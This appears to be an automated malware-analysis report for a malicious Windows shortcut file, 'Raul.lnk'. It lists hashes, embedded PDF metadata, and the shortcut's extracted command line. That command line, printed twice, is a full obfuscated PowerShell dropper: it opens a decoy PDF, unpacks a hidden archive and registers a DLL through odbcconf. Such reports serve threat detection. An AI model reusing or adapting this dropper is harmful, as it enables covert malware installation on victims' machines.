|
Hash | Hash Value |
|---|---|
| MD5 | cc4f9624f5b3645c62bbaff154594398
|
| Sha1 | c34a9c256e7b3f364014da1ff60d54da113229b2
|
| Sha256 | 8f374c1c525207b56f0ac6e5ca3618772b6013717e59f29151d685f4d1cea7af
|
| Sha384 | 918c59fc54224de2ba0772be4db22fac7b6aa51e69f7644fb6ffca891565f94eae46cfef7d609a444a8da84df3e380e0
|
| Sha512 | a033f4ca85ab979c9574c893810a40fd4be307b5227f30cd6179658120d851b695d3f66d095e541afcc07883c02632bc8c29968ec36f0ed4ece669cc8ee19905
|
| SSDeep | 24576:n6Ohw6hcMFpatLsNP6UdeMCOeIXgk1Gk3f6IV:6+HhcMFpatLst6We031bj
|
| TLSH | D01523150CFED9A0AD7D8510BA19AAE21B1E5F2F28077D4F903CBE4D3FD7A80250566B
|
|
Name0 | Value |
|---|---|
| PDF @0x000010BF | 1.5 |
| PDF @0x000010BF | Microsoft® Word 2016 |
| PDF @0x000010BF | Microsoft® Word 2016 |
| PDF @0x000010BF | Microsoft® Word 2016 |
| PDF @0x000010BF | Microsoft® Word 2016 |
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='ssf.zip';$pd='Raul.pdf';$pdl='Raul.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr "$F\sst" `} ; |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='ssf.zip';$pd='Raul.pdf';$pdl='Raul.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr "$F\sst" `} ; Malicious |
cc4f9624f5b3645c62bbaff154594398 > 66c3d1cd6b3835c0c756c08abb52012e5bec6b1d9a637dccbe488e4d921b34d3 > Raul.lnk |